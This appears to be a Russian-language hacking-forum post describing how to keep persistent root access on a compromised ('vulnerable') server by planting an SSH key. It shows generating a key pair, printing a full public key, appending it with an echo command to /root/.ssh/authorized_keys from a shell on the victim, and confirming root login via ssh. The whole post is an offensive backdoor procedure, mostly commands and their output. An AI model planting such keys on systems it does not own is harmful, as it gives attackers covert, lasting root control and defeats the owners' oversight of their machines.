Закрепление в системе через ключи rsaauthentication ssh
Все знают данный метод, но тут он не описан...
Минус метода в том что он паливный когда пользователь на уязвимой системе не использует данный метод авторизации.
Зависимости:
В sshd_config
Код:
RSAAuthentication yes
Приступим:
1) Добавляем тестового пользователя, переключаемся на него:
Код:
# useradd -m xekir
# su - xekir
2) Генерируем ключи у этого пользователя:
Код:
[xekir@home ~]$ ssh-keygen -t rsa
3) Публичный ключь-строку вносим в список авторизованных ключей на уязвимом сервере:
а) сгенерированная ключь-строка лежит в
Код:
[xekir@home .ssh]$ cat /home/xekir/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home
б) список авторизованных ключей на уязвимом сервере (с шела):
Код:
$ cat /etc/ssh/sshd_config | grep AuthorizedKeysFile 2>&1
AuthorizedKeysFile %h/.ssh/authorized_keys
Вносим (с шела):
Код:
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home' >> /root/.ssh/authorized_keys
Проверяем:
Код:
[xekir@home .ssh]$ ssh root@192.168.0.100 "id;hostname"
uid=0(root) gid=0(root) группы=0(root)
debian-webserver386
Ссылка по теме:
http://www.opennet.ru/base/sec/ssh_pubkey_auth.txt.html